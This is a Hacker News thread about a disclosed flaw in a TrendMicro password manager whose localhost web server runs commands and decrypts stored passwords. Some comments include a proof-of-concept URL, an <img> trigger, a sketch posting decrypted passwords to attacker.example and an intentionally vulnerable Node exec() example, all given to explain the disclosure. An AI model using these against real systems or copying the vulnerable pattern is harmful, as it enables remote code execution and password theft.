Hacker News
TrendMicro Node.js HTTP server listening on localhost can execute commands (code.google.com)
1030 points by tptacek on Jan 11, 2016 | 229 comments



Props to Tavis for maintaining his composure in the face of this incompetence. Despite his mounting frustration, you can see he keeps repeating his request, "Turn it off, apologise for the disruption, and then get it audited before turning it on."

Even when they perform their half-solution, he still evaluates it on its merits, and then suggests how they can do better. A model of professionalism in the face of an absurd situation.


What an absolute clusterfuck. I work at a multinational company whose IT department (over my objection) installs Trend Micro on all user endpoints. I'll be sending this the department head's way; Trend might lose some business over this.


Bonus points to Tavis Ormandy for this classy exploit code:

https://code.google.com/p/google-security-research/issues/at...

    <a href="javascript:begin()">Click Here</a> to run the command above 
    (the default will uninstall Trend Micro Maximum).


Wow, I've only played with JS for a few days and I can interpret that pretty easily, so this seems pretty simple.


The JS is inconsequential, really. Just making the correct HTTP request, even by typing it in your browser, is the exploit.
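
For illustration, the proof of concept boils down to visiting a URL of roughly this shape (the endpoint name matches what the report describes, but treat the exact port and parameters as illustrative):

    https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe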


Lol. Yes, funny how people love to throw JavaScript/Node.js into the mix.

It's like "They're using JS; how could it possibly be secure?!". That's actually highly ironic considering that JS is so far the only language that is secure enough to run universally in every browser on the planet.

People won't accept that JS has evolved a LOT since it launched, so it still suffers from a bad name.


You misunderstand why people think JS is insecure. The problem is that JS is really easy to make mistakes in because of silent errors, dynamic typing, type coercion, etc.

The result is that your server-side JS is more prone to different kinds of security issues.

On the client side, in the browser, JS is sandboxed, so the language is almost irrelevant. If JS can't actually access the underlying system, no number of bugs makes the code insecure.


> The problem is that JS is really easy to make mistakes in because of silent errors, dynamic typing, type coercion, etc.

None of those is a factor in this instance. It seems to me it's the result of calling exec() on unscrubbed user input, and that can be done in any language.
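
A minimal Node.js sketch of that anti-pattern (hypothetical code, not TrendMicro's actual implementation):

    // DO NOT DO THIS. A hypothetical endpoint that shells out to
    // whatever arrives in the query string.
    const http = require('http');
    const url = require('url');
    const { exec } = require('child_process');

    http.createServer((req, res) => {
      const { cmd } = url.parse(req.url, true).query;
      if (!cmd) return res.end();
      // Any local process -- and, via the browser, any web page -- can
      // reach this listener, so "user input" means "the entire internet".
      exec(cmd, (err, stdout) => res.end(stdout || ''));
    }).listen(49155, 'localhost');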


I agree. I was responding to a tangential comment, rather than the root post.


Where has JS been given a bad name here? I didn't get that vibe.


One of those JS devs who gets really defensive when people are talking about JS and not screaming about how awesome it is.


In my experience, saying you mostly do JavaScript in a room full of other coders means they'll all scream at you to use a "better" language (on HN too).


Languages aren't inherently secure or insecure. In any case, nobody was accusing Node.js of being insecure here.

JS is not "the only language that is secure enough to run universally in every browser on the planet." In fact, JS has had many, many security issues in browsers.

Rather, JS is the only language nearly every browser on the planet has implemented (hopefully sandboxed!)


>Languages aren't inherently secure or insecure.

This is just not true.


Explain?


A language's specification can forbid you from doing things that you probably didn't intend to do. Rust is an entire language intended to be safer by design (as opposed to C, which is the cause of a lot of security issues). You can write less safe code in Rust, but you have to tell the compiler that you're doing it on purpose.

It's also much, much easier to introduce bugs in certain languages because of the way they handle errors, or because the syntax is confusing and ambiguous. Even permissive handling of boolean logic, like what you get in PHP/JavaScript ("0" == false evaluates to true, for example), can result in massive security holes.
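
A few JavaScript comparisons that show how easy this is to trip over:

    "0" == false   // true  (both coerce to the number 0)
    "0" == 0       // true
    0 == ""        // true  ("" coerces to 0)
    "0" == ""      // false (two strings, compared directly)
    "0" === false  // false (strict equality, no coercion)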


As another example, Go's := makes it much harder to do things you aren't intending to do.


Though it sounds like you're agreeing with me, that is not at all what I was saying.


Yes, I was just adding to your comment. Just pointing out that there is a pattern of people blaming JS even though it's not related to the problem at all. The same vulnerability would have existed regardless of whether the code was written in Python, Go, C, Erlang, Haskell, PHP or Scala... This is a logic error - not something a compiler would pick up.


In Haskell or Scala you could quite easily structure the code such that concatenating strings from different sources like that would be a compile error.


This is a massive design flaw, not a logic error. While I applaud the use of APIs for modular design and communication, this is the wrong place for one.


This is clearly a terrible design flaw by Trend Micro. I hope some of those responsible are looking for new jobs.

Still, I don't put much faith in any endpoint security solution. They are all terrible.

Bromium seems to be bucking the trend of traditional endpoint security but they have one of the worst sales / business dev programs I have ever seen. They should be much more ubiquitous than they are.


"I hope some responsible are looking for new jobs."

If they look for (and find) new jobs wouldn't that just mean the problem is diffused? Personally I would hope they learn from the experience of failing than to get punished for it.


Personally, I hope everyone else (not at Trend Micro) learns from this experience. Computer security auditing is a serious expertise; it's hard, and it becomes nearly impossible when you don't have experts on the team and instead treat security expertise as a hobbyist qualification.

trendmicro.com > About > "Smart, simple, security that fits"

And then second is, "a global leader in IT security" and "25 years of security expertise".

What a crock. I'm supposed to take the company's position statements and products seriously after reading this issue report? This is like finding a sponge in the body cavity of a patient. It's functionally malpractice. The CIO and CTO should be fired. The CEO should probably resign; what else is the purpose of a CEO other than to make sure the main things the company stands for are true, and that it actually ships products demonstrating it stands for those things? If they don't resign, the board needs to fire them.


I'd like to point out that it'd be an even bigger and redder flag (if that's possible) should Trend Micro fire some team's "security" developer, or even the product manager.

How is it possible that a company which describes itself in the terms it has [1] has not done a thorough code review of all its products before making them public? That is implicit in their own description of what their business does.

I'm not even sure the worst parts of this particular product's flaws would have escaped even a cursory code review by someone who is actually a security expert. And if that's true, then selling this product as it was before patching might be fraud.

[1] http://www.trendmicro.com/cloud-content/us/pdfs/about/ds_cor...


That's a great sentiment, but sometimes we have to stick to more realistic hopes.


Those people who are responsible just received a significant education.

I don't think throwing coders or designers into a pit when they make big errors does anything helpful. Most likely, Trend has a cultural problem. Big errors like this can be an aid that spurs corrections.


The problem is that endpoint OSes are horribly insecure. It's hard, well-nigh impossible, to build a third-party "endpoint security solution" for that, since it amounts to creating an aftermarket patch to plug a leaky dike.


There's a simple solution for that. Use a unikernel and make the entire OS immutable.

I'm really looking forward to the day where the tools are mature enough to make this an option.


I don't think it qualifies as a "simple solution" if it's not feasible with today's standards.


Simple != trivial.

A space elevator is simple. Building one is very much not trivial.

This is similar.


NodeOS is well on the way.

Packaging a server backend along with a minimal kernel and V8 VM isn't any more complicated than most of the build tools used today.

Here are the specifics: http://node-os.com/GitBlog/article.html#!200

When you cut 99% of the crap out of an OS, it becomes a lot easier to package/distribute.

Most of the work on NodeOS has to do with replacing POSIX with Javascript equivalents.

Immutable operating systems aren't a new idea either. How do you think a Linux LiveCD works? ChromeOS is basically an immutable OS with an added persistence layer.

There's a lot more work to be done before any of the Unikernel implementations (ie NodeOS isn't the only one) are ready for production.

With that said, for webservers that aren't required to persist any state locally, it makes sense to remove mutability -- and therefore OS-level security vulnerabilities -- as a concern. That way, devs have more time/resources to focus on app-level security.



Fine for single-purpose app deployments, but on a grander scale you've just pushed all the security problems back to the APIs and interfaces of your cloud provider and/or virtualization engine. Now an AWS access token constitutes a root password for everything (for example).


Access tokens are a 'manageable' risk and AWS provides tools to enforce best practices where necessary.

Locating and regularly patching security vulnerabilities across thousands of components in a fully-featured monolithic operating system isn't. It's a potential disaster waiting to happen.

You don't need...

...a huge bundle of drivers when the OS will always run on a VM.

...extensive filesystem support when everything will be either transient or run directly from memory.

...multiple users when only one is required.

...OS-level sandboxing (ie kernel/user-space) when the VM already provides sandboxing.

...native POSIX tools when 'safe' alternatives can be run from the VM.

Despite the best intentions of developers and admins alike, the current approach to security is not working. Despite my own vigilance, I have personally had my sensitive information leaked by two separate multi-billion dollar organizations in the past year.

It's a simple fact that every feature added increases the attack surface of the entire system. All I'm suggesting is that it's not a bad idea to start looking at the alternatives that are becoming available.


Bingo. The PCs of old were more secure in that they did only one thing at once. These days even the most barebones install has all manner of things running in the background, and any normal user setup is likely to add a dozen more.


Pretty sure this only works on the personal version of their software. We don't even have an option to deploy a password manager (that I'm aware of) as part of the enterprise Anti-virus product.


Regardless, given what was discovered in the personal version, would you trust the enterprise version?


The personal versions are what get saddled with "Value Add-Ons" like password managers/website screening with colorful icons/blah blah bullshit bullshit. Most enterprise anti-virus software concentrates on finding viruses and maintaining compliance with whatever policies you have. They are also usually managed by different divisions with different goals.

(Whether or not anti-virus at all is effective is another debate entirely.)


I really do wonder how the market got segmented like this...


Confirmed, this does not work for `Trend Micro Worry Free Business Security` clients. I do know that the enterprise / business version installs a server on the management machine. I do not currently have access to the box that our version is hosted on to test the exploit there.


Really, it's a simple email away from a complete disaster.

Send an email to several people in the organization containing the offending JS that calls shell execution; this could have a huge impact.

"Security software" LOL


While email can't directly call JavaScript, these URLs look like they'd work if just loaded, so an <img> tag might suffice to cause shell execution.
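
Something like this (endpoint and port illustrative, as above) embedded in a page, or in any mail client that loads remote images, would fire the request:

    <img src="https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe">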


True, and you can always have a "Click here for more info" in the email pointing to a believable page.

But yeah, an image will most likely do it.


Check if your installation is vulnerable. My company uses TM OfficeScan for desktops and this doesn't work (I think this Password Manager is not even installed, but I just tried the localhost URL PoC and it doesn't work).


From the email thread:

> I happened to notice that the /api/showSB endpoint will spawn an ancient build of Chromium (version 41) with --disable-sandbox. To add insult to injury, they append "(Secure Browser)" to the UserAgent.

> I sent a mail saying "That is the most ridiculous thing I've ever seen".

This is indeed unbelievably ridiculous.


More ridiculous than that time Microsoft shipped an operating system with no firewall enabled by default and a feature designed to allow for remote commands to be executed?

I think the Blaster Worm and other variants that took advantage of that excellent decision were far worse.

https://en.wikipedia.org/wiki/Blaster_(computer_worm)

https://books.google.com/books?id=_TgEAAAAMBAJ&pg=PA60&lpg=P...


You can make a lot of things sound comically insecure, very much including virtually all open source software, if you use 2003 as the benchmark.


Not really.

A FreeBSD 4.x system with a (modestly) stripped down kernel and running sshd was not only rock solid in 2003, but would probably be rock solid today.

Just to pick one random example.


Doesn't sound like a random example to me. It sounds like one of the most secure examples you could think of.


No, FreeBSD 4.x from 2003 would not be "rock solid" today; it had kernel RCEs. Not to mention the ones in OpenSSH.

Nothing was secure in 2003.


Hmm... I would have to look to be sure, but having lived through it all, I seem to remember that all of the 2-3 OpenSSH security advisories that came out for FreeBSD in the last 10-12 years were either:

a) incredibly far-fetched theoretical attacks that didn't work in almost 99% of live deployments

b) local privilege escalation that required a real unix login on the system to exploit

I think if you had left a FreeBSD 4.x system running on the public Internet all of these years you would have been untouched.


I've been doing FreeBSD security in particular since 1996, when I got the commit bit for discovering the crt0 environment overflow flaw, and all I can say is that this just isn't true.

You don't even have to be a security specialist to know that there's something wrong with your argument, because you're talking about exactly the time period where OpenBSD --- which is more secure than FreeBSD --- comically started having to change its tagline from "no remote vulnerabilities in the default install" to "just one vulnerability in the default install" to "only two remote vulnerabilities in the default install for a heck of a long time".

Even OpenBSD concedes it wasn't secure in 2003!


Or that time the Trojans let the Greeks send in a horse full of soldiers.


Your example is ridiculous; in this case Trend Micro took a year-old product missing several patches, turned off the single most important exploit mitigation in a modern browser, slapped a sticker on it that said "Secure Browser", and shipped it. Versus, you know, shipping an OS that doesn't contain those features, more than a decade ago.


Yeah, it's more ridiculous because they specifically named it the "secure browser" API.


Having studied their Linux Antivirus (TrendMicro ServerProtect), it's far from a clean, safe and well maintained piece of software:

* It comes with its own http server (apache, with a conf file mentioning NCSA (!))

* Their realtime kernel module barely compiles (on quite old kernel versions), has disgusting code and a disgusting Makefile, and makes the computer slow or simply crashes when it kind of works.

* They ship their Antivirus with quite old libraries, some compiled more than 10 years ago, and some probably impacted by several CVEs (openssl < 1.0.0, quite old libxml).

* Their init scripts are an ugly thing written in Perl, launching several services in one script.

* Their rpm packages are just mindfucking. You have one rpm package to install the software, and other rpm packages to patch it... WTF.

For a piece of software running as root (or even worse, in kernel space), written in C and analyzing untrusted inputs by definition, it's a bit worrying to say the least.


To be fair, I've never used a Linux antivirus suite that wasn't a complete piece of garbage. For instance, every single on-access scanner I've ever seen has been so broken and terrible that it gets disabled almost immediately because it impacts the system's ability to function reliably.

Makes me wonder why any of them bother, except for the piles of cash they can make off of unscrupulous rubes in management who demand AV software across the entire environment.


ClamAV is decent-ish compared to these. It's still written in C, so sandbox it heavily...


Why is a conf file mentioning NCSA so surprising? Mosaic has a lineage that can be traced to modern browsers like Edge, so it'd make sense to have conf items geared toward the NCSA family of browsers.


That'll be talking about NCSA HTTPd, the ancestor of Apache. Apache forked in 1995.

https://en.wikipedia.org/wiki/NCSA_HTTPd

Any Apache configuration file mentioning NCSA would be from the Apache 1.x lineage.


Apache is derived from NCSA HTTPd; a config file that mentions NCSA is a sign of the age of the Apache codebase in use, or of an extremely old default configuration file.


With regards to TrendMicro I still remember having to deal with an end user who had this installed and had the "internet security" feature enabled.

It intercepted the not-quite standard response header "Content-Encoding: ps-bzip2" to our windows client application, stripped off the header it didn't understand but, of course, didn't decompress the payload.

So our application never saw a Content-Encoding header and thus tried to run with the presumed-non-compressed response - that went really well.

Since that day, our server uses a content-type header that contains the word bzip2 :(

The icing on the cake: The customer in question told me that their cousin is working at TrendMicro and that they are by far the best virus scanner out there and that this must clearly have been my fault.

I'm not surprised that they also get other stuff wrong.

However, I'm surprised at the level of incompetence shown here. This is a security product after all.


> It intercepted the not-quite standard response header "Content-Encoding: ps-bzip2" to our windows client application, stripped off the header it didn't understand but, of course, didn't decompress the payload.

I think this is actually a feature in many different products from different vendors. If I recall correctly, ISA Server (since 2004!) and the like inspect HTTP and SMTP traffic and validate it for conformance to published standards. If a malformed SMTP message comes in, it discards it. This prevents your mail server from being exposed to malformed messages, which could lead to denial-of-service/remote-code-execution/maybe it will be fine who knows.


The Content-Encoding header is meant to be extensible. This is how Chrome added SDCH, and now we're about to get Brotli compression in Firefox and Chrome. If that release of TrendMicro were still in use, people wouldn't be able to visit Google with Chrome, nor any upcoming site with Brotli support.

Also, if they didn't like my ps-bzip2 encoding, they could have stripped it off the client's Accept-Encoding header too, causing the server to not compress the response. But they left it there and just stripped off the Content-Encoding response header.


Headers are meant to be flexible in theory, but in reality it seems that anything outside the most common few is going to break things.

The series of blog posts linked below might interest you.

http://noxxi.de/research/http-evader-explained-2-deflate.htm...


> I think this is actually a feature in many different products from different vendors.

It is, but it sounds badly implemented as described here.

Stripping headers and sending on the rest of the message with no care for the content is bad design, you are essentially corrupting a request or response.

If there is a problem with a message, discard or quarantine the whole thing and log the event for future analysis (in the case of SMTP, perhaps send the target a "we blocked this, check with the sender if you really need it" and/or the sender a bounce, if you are reasonably sure the source's headers aren't faked).


What a shambles.

This thing with so-called security products should be regulated somehow. These sorts of exploits should carry a huge fine from the FTC or something of the sort, as this and many other "security" products (I'm looking at you, AVG) are blatant deception, if not the exact opposite of security.


We should all demand 3rd-party audits of our security products.


I was really thinking the same thing. Just like electronic products have UL[1] certification, there need to be a few labs that really look at how these products are architected and what the data exposure is like, then rate them accordingly.

[1] http://ul.com/


Imagine if there was some sort of government agency that did this as a service to protect its citizens. Some sort of National Security Agency, if you will... Oh wait, we already have that and they do the opposite. :|


And it'd even be something that politicians could realistically say!

> We need the Antivirus-TÜV now!


Not only security products, but all the core parts of our daily software stack.

I can imagine, in the future, an OS becoming like a nation. There's a core, transparent "government" component of the system which takes care of all low-level resource management and security (just like a real-life government), and there's a proprietary app which has a secret component but has to play by the rules (just like a real private company). All the government's behaviors and its legislators (i.e. maintainers) are constantly monitored by its users and the media, and they are accountable for their actions.

Yes, this is far from perfect, and while we still might have the NSA of a kernel and the Enron of 3rd party apps (whatever it means), I'd argue this is better than the current everything-is-proprietary model.


I've been saying for years that unregulated information security will lead to an Enron-level disaster and eventually result in legislation similar to Sarbanes-Oxley. It's a shame it will take a huge disaster for this to happen.


The huge disasters have been happening, repeatedly, for years.

There are botnets in the millions running on supposedly "Norton-protected" PCs.

No one cares. It's not a problem the people in a position to do anything about even understand.


It's more likely to be Pearl Harbour than Enron if IoT ever becomes popular without improved security.

Having your server hacked is one thing. Making kitchen appliances burst into flames - which is not impossible with remote control - is something else entirely.

It's a national security issue. Imagine a state actor or a terrorist org deliberately launching a synchronised mass IoT attack against another country.

Imagine the attack is untraceable because it's routed through all the botnets out there.

It's great the NSA wants backdoors everywhere, because that will make attacks easier to trace - won't it?


If we all demanded it now, it theoretically (TM) wouldn't require legislation.


So who are some legitimate auditors?


Proper penalties on contracts and/or established no-buy lists might be more effective. Push the balance between "boring product" and "useless features" a bit more towards the former.


and audits of the 3rd party auditors?


As a consultant for a company[1] that provides code auditing services, I welcome third-party scrutiny of the open source libraries[2] we produce.

[1] https://paragonie.com

[2] https://github.com/paragonie


I presume sarcasm. Interestingly, the auditors would be taking on the risk that they've done a bad job, so their auditors are the security experts who keep finding these security holes.


Yup. No, really.

We'll want to document the successes and failures of security software companies, their auditors, and their auditors' auditors.


Those responsible for auditing the auditors who have just been audited, have been audited.


Welcome to the "many eyes, shallow bugs" side of the world.


Which is why the linux kernel is such a pinnacle of security excellence. /s


This is so bad that Tavis Ormandy was "astonished" by it. That has to be saying something.


The title on HN understates the case at this point. It's not just remote code execution (more than bad enough, by itself). If you are foolish enough to trust Trend Micro, they install a password store, whence:

   Then you can use the decryptString API to decrypt all the strings, and then 
   POST them somewhere else.
    
   So this means, anyone on the internet can steal all of your passwords 
   completely silently, as well as execute arbitrary code with zero user 
   interaction. I really hope the gravity of this is clear to you, because I'm 
   astonished about this.

You can convince their shit product to POST ALL YOUR PASSWORDS to an arbitrary server.
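
In browser terms, the attack shape is roughly this (a sketch; the decryptString name comes from the report, everything else is illustrative):

    // Runs in any web page the victim happens to visit.
    (async () => {
      // Ask the localhost service to decrypt the stored secrets...
      const resp = await fetch('https://localhost:49155/api/decryptString?data=...');
      const secrets = await resp.text();
      // ...then POST them somewhere else, exactly as the report warns.
      await fetch('https://attacker.example/collect', { method: 'POST', body: secrets });
    })();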


This really is a horrific security flaw. Hard to believe that software made specifically to protect users and their computers opens up the floodgates and serves their passwords on a plate.

I wonder how much damage such a flaw has caused?


Where did you get the idea that this software is "made specifically to protect users and their computers"?


> Where did you get the idea that this software is "made specifically to protect users and their computers"?

Read the marketing copy for it.

http://www.trendmicro.com/us/home/products/software/password...

Note also

* that TM charges $15/year for any non-toy use of the software (that is, if you want to store more than four passwords)

* the language that describes the "Secure Browser" feature, which is really an ancient version of Chrome/Chromium that has sandboxing turned off.


OK ... let me spell it out for those who apparently can't figure it out by themselves:

"This is really a horrific medical safety problem. Hard to believe an oil that is made specifically to cure your ailments has non-foodsafe stuff in it!"

If the packaging of snake-oil tells you about its miraculous properties ... that is, believe it or not, not a reliable source of information.


I'm finding it harder and harder to understand why I should ever install software that hooks into my OS on multiple levels and opens holes to the outside world without any notification, all in the name of "security".


You shouldn't. Antivirus is a relic of the early 2000s.


Let me back this comment up with some reading material and useful resources:

http://decentsecurity.com/about/ (This entire website)

https://www.microsoft.com/emet (for Windows)

https://paragonie.com/blog/2015/06/guide-securing-your-busin... (basic web security advice for non-technical people)

You don't need AntiVirus.


It is not that we don't need it; it is finally obvious that there is no reliable way to detect harmful software. All we are left with is putting each and every application in a sandbox, unable to interact with any other software or user data. It is just very hard to make that user-friendly and acceptable to the average Joe.


This is basically my stance at this point.


Yeah, like condoms...


No, not like condoms. If STDs became blockable with common sense, and condoms started shipping with perforations and prickles on the inside, then yes. But that's not the case, is it?


I think he was trying to draw an analogy between installing untrusted software, and getting intimate with untrusted people. Both are avoidable.

One obvious difference is that the consequences of mistakes can be higher for STDs than for infected computers, but that's the analogy.


Condoms also prevent pregnancy. This comparison is ridiculous.


The DOJ-imposed restrictions preventing AV from being an OS component have run out, so now, properly, AV is again a background OS component, and the third parties are more and more proven to be snake-oil salesmen.


How did no one within the company catch it? Aren't security products developed by at least somewhat security-minded people? Is it all just a sham?


No, security products are not typically developed by people who understand secure programming, even at companies that employ teams of people to do vulnerability research. The people who build security software are the same as the ones who build everything else.


I can confirm this is the case for my company. The software we produce can be classified as security software, yet nobody is trained in secure programming or even basic security principles (e.g. validate all input, defense in-depth, etc). I'm by far the most security-minded developer on a team of about 20 developers, but everything I know is because I'm interested in the realm of security.


Companies that produce "security products" don't give a damn about secure development. They do give a damn about infographics and sales presentations citing "sexy-sounding" research projects.


> They do give a damn about infographics and sales presentations citing "sexy-sounding" research projects

Sort of like the startup community?


Not too different. Most antivirus is based on a flawed premise, and most hackers know this.

http://www.sevagas.com/IMG/pdf/BypassAVDynamics.pdf


I don't mean secure programming, just people who would poke their product a little over lunch.


> Is it all just a sham?

Yes, unless you are so computer illiterate as to regularly download old viruses by accident.

> How did no one within the company catch it?

I doubt they do any reviews of their code beyond QA/"Does it work?"

> Aren't security products developed by at least somewhat security-minded people?

No. Pretty much the people who test for vulnerabilities [i.e. actual security-focused programmers] are more expensive than the average Windows desktop programmer.

Now just imagine what companies that process your credit cards look like...


>Is it all just a sham?

Yes. There's hardly anything* local to a client worth paying money for that will make you more secure.

*--> hedging for a miraculous product I just don't know about


Where did you get the idea that antivirus software is a security product?


Just another reminder that antivirus is dead. Any antivirus can be trivially circumvented. Based on the level of incompetence of multiple antivirus developers over the past few years, and my own experience with antivirus slowing down and heating up my machine, antiviruses themselves are more like trojans than anything.


GPO with AppLocker (app whitelisting) seems to be a good solution for Windows; kind of a pain to set up though.


While that seems like a somewhat sensible approach for non-technical end users (modulo various kinds of runnable scripts), a whitelisting approach can't possibly work in an organization doing software development.

I can't think of any technological approach that would work in such an organization, short of completely redesigning end-user client systems.


If I was to use antivirus it would have to be whitelisting. Everything else is a toy in my opinion.


> They are already in discussion with stakeholders regarding the emergency deployment of this fix.

You know a company is managed ineffectively when you can't even deploy security patches without talking to stakeholders. In any reasonably-managed company, stakeholders would only be involved with the press release announcing the issue (if at all).


That's not what this means at all. In any given company there are X individuals across Y teams involved in deploying a piece of software (never mind an emergency patch). Stakeholders in this context refers to all those involved in making it happen: devs, QA, PMs, documentation, marketing, etc.

The problem isn't solved as soon as a patch is released. This is serious damage control. Handled poorly it blows up. A lone dev doesn't/shouldn't hold all that responsibility.


I would hope "stakeholders" is in reference to Project Stakeholders (i.e. Project Managers) and not stakeholders in the company (which would be absurd).


I think you've confused "stakeholders" with "shareholders".


This is true. The only time I ever had to talk to my CEO about a security patch was, "Sorry, this bug is kind of urgent and the fix needs to be deployed before tonight. Bring me back some orange chicken?"


Stakeholders != CEO. It can be, but it's hardly the only option.


We don't have puppeteers, so it's the only approximation I could muster from my experience.


I don't understand this thread at all.

Where I live, "stakeholders" just means the people responsible for or affected by something. Being "in discussion with stakeholders" about a fix just means talking to everyone involved in getting it deployed.

Is this term used with other meanings?


I misread it as "shareholders" to be honest.


I think I was confused with shareholders vs stakeholders.


This is so blatantly incompetent that I can only imagine the situation being a result of corporate dance.

While there are many oblivious developers, I highly doubt that incompetence was the root cause. I'd point to a lovely mix of a) deadlines; b) slow internal procedures to approve the usage of third-party libraries; and c) requirements being passed to developers without context. It's hell, what corporate environments can push us to do. I'd bet that most of the people who worked in big corps have their own stories about internal procedures making them do things they objectively knew were wrong.


Well this is scary. How am I to trust a password manager if something as obvious as this is allowed to be shipped to the end user?


Most password managers are heavily audited. The likely reason the Trend Micro one wasn't is that nobody with any technical sense is installing their nonsense to begin with.

But LastPass, KeePass, Chrome's password manager, Firefox's manager, and IE's are audited all the time, with tons of exposé articles supposedly trying to inform us about how weak they are (but all these articles do is further clarify how strong they are, since they only find trivial issues, or they misunderstand a feature as a bug).

I cannot recall the last time any of these had what I would consider a REAL security bug.


Most password managers are not heavily audited. Random third parties look at them and occasionally find things, but that's not the same thing as the development team bringing an auditing team in and giving them access to all the source repositories and documentation.


Chrome and Firefox both store saved passwords in plain text in easily accessible local databases. Don't rely on them to keep passwords safe. I have no experience with IE's password locker.


> Chrome and firefox both store saved passwords in plain-text in easily accessible local databases.

All password managers store plain text passwords. That's literally a requirement for them to work at all.

Chrome encrypts the password in the SQLite database[0] using Windows' CryptProtectData() API, and Firefox encrypts the passwords either using your master password, or if none is set then it encrypts but stores the encryption key in the key3.db.

> Don't rely on them to keep passwords safe.

You've presented no justification for that. If you're using a root compromised machine then no password manager is safe. If your machine is secure then your passwords are secure in both Chrome and Firefox, but more secure in Chrome.

[0] http://www.howtogeek.com/70146/how-secure-are-your-saved-chr...


> All password managers store plain text passwords. That's literally a requirement for them to work at all.

I'm not sure this is what you mean to say, because, obviously, good password managers don't store passwords in cleartext.


You cannot hash passwords in a password manager. It has to be reversibly encrypted and turned back into plain text before utilisation.

So when people complain about password managers storing plain text (as opposed to hashing) they're barking up the wrong tree, it is a necessary evil.

You just want to see them encrypt those plain text passwords so that offline recovery is harder. That's what Firefox's master password, CryptProtectData() for Chrome/IE, and the keychain in OS X all provide.
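
A minimal sketch of the difference, using Node's crypto module (names and parameters are my own, not any particular product's):

    // Password managers must be able to reverse the transformation, so
    // they encrypt with a key derived from the master password rather
    // than hashing. Sketch only.
    const crypto = require('crypto');

    const salt = crypto.randomBytes(16);
    const key = crypto.scryptSync('master password here', salt, 32);

    function encrypt(plain) {
      const iv = crypto.randomBytes(12);
      const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
      const ct = Buffer.concat([cipher.update(plain, 'utf8'), cipher.final()]);
      return { iv, ct, tag: cipher.getAuthTag() };
    }

    function decrypt({ iv, ct, tag }) {
      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);
      decipher.setAuthTag(tag);
      return Buffer.concat([decipher.update(ct), decipher.final()]).toString('utf8');
    }

    const stored = encrypt('hunter2'); // ciphertext at rest
    console.log(decrypt(stored));      // plain text again, at use time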


I think you're trying to say something akin to but not quite "plaintext equivalent", and your terminology is mangling your argument.


Ah come on, you obviously understand what he is trying to say. You don't always have to interpret every comment online as if the person writing them is stupid.


> All password managers store plain text passwords. That's literally a requirement for them to work at all.

> Chrome encrypts the password in the SQLite database[0] using Windows' CryptProtectData() API

If it's encrypted, then it's not plaintext. It's ciphertext. In infosec lingo, plaintext specifically refers to the unencrypted and otherwise unaltered original information.


Seeing as the parent comment was in reply to an assertion that Chrome stores plaintext passwords, I think it was assumed that the assertion intended to mean "Chrome has access to your plaintext passwords", otherwise the reply would simply have been "No, you're wrong".


Firefox will encrypt your saved passwords if you set a master password on the Security Preferences panel. Really should do so by default, but at least it's available as an option.


This is simply untrue.


ON WINDOWS.

A couple of years ago, Chrome joined Safari in using the OS X Keychain. (On Ubuntu, Chrome can also use the gnome-keyring.)


>How am I to trust a password manager if something as obvious as this is allowed to be shipped to the end user?

You don't. Assume every online service you use is subject to security holes. What separates a secure app from an insecure one is only revealed after a security incident. That's why I continue to use LastPass: they exemplified good security practices during their recent scare.


Have a look at this solution, a shell wrapper around GPG for managing passwords - https://github.com/drduh/pwd.sh


> To be clear, you can get arbitrary code execution whether they're using it or not, but stealing all the passwords from a password manager remotely doesn't happen very often, so I wanted to document that.

Best part.


This recent one, in regard to an AVG Chrome extension, is slightly "less-worse" than this TrendMicro issue: https://code.google.com/p/google-security-research/issues/de...


http://www.trendmicro.com/us/about-us/index.html Smart, simple, security that fits

As a global leader in IT security, Trend Micro develops innovative security solutions that make the world safe for businesses and consumers to exchange digital information. With over 25 years of security expertise, we’re recognized as the market leader in server security, cloud security, and small business content security. Trend Micro Inc. is a global security software company ....


> TrendMicro helpfully adds a self-signed https certificate for localhost to the trust store, so you don't need to click through any security errors.

Anyone know if this uses a non-unique key pair like the Lenovo one did?


I don't think it really matters, as long as it's only a certificate for localhost rather than a root CA as in the Lenovo case. I can't think of an attack scenario where an attacker already able to run an HTTP server on localhost would be aided by being able to use HTTPS on that server. Of course, I could be missing something.


I can't even begin to describe my loathing for antivirus products. I haven't used one personally in years, but there is a real quandary for a few of my colleagues--they are not very technically inclined. This ranges in consequence from needing help with simple tasks to having absolutely zero instinct/ability to recognize phishing or questionable emails and links. I usually end up putting something on their machines to help but often feel like it's a lost cause.


I'm presuming Windows because "not very technically inclined" but at this point when I help such people it's mostly a matter of A) verifying UAC is active and at or higher than the default [1], B) verifying Windows Defender and Smart Screen are active and up to date (Windows Update).

In every case I've seen of Windows Defender or Smart Screen being disabled or out of date it almost always seems to be the fault of a "security product" the user was talked into buying (especially the Norton Insecurity Suite). Defender and Smart Screen together silently but capably do their job at handling the main issues for a not very technically inclined person's systems and I find the harder issue is convincing them not to install games from disreputable sources (random poker websites, the weird shadows of once sort of reputable places like RealArcade and WildTangent) that install irritating adware and occasionally spyware, short of "taking away the UAC keys" and forcing them to call me to type in an admin password to install software for them, which I don't have the time/inclination to do.

[1] If a not very technically inclined user complains they see too many UAC prompts they are probably doing something wrong and you should help them figure that out.


Windows Defender on Windows 10 works fine. You'd be crazy to either disable it and/or install a different security product.


It's absurdities all the way down!

My favorite part is that they use the address pwm.trendmicro.com. (I had to finger peck that now, my muscle memory kept typing something much more fitting.)


Is there a US-CERT advisory for this yet?

Why are those APIs even there? A "retrieve all passwords in the clear" API? A "run browser insecurely" API?

Has anyone considered charging Trend Micro with reckless endangerment or material support of terrorism?


On the bright side, they reacted relatively quickly for such a large company, and fixed the vulnerability.

Whoever is in charge of security for that project must be pretty embarrassed (or the person doesn't exist)... Also no audit? cmoooon.


Is there any reasonable explanation for why anti-virus vendors so often include shady or insecure software like this? It's honestly the worst kind of security theater, where it looks like it's helping but is doing the opposite. I really wish AVs didn't try to include extras, as this further lowers my opinion of the (scammy) anti-virus market. And this isn't the first time an AV turned out to make the computer less secure.

I have Avira Free installed, but only the AV part; I have disabled Web/Mail Protection. So I am hoping that Avira are trustworthy enough and don't push anything my way.


Of course, it's not the first time. As a matter of principle, antivirus software cannot work. The whole idea is a scam. So, how is it surprising that they bundle other equally useless/scammy software?


Wow. Feel kinda bad for the TrendMicro team. This has to be rather embarrassing.


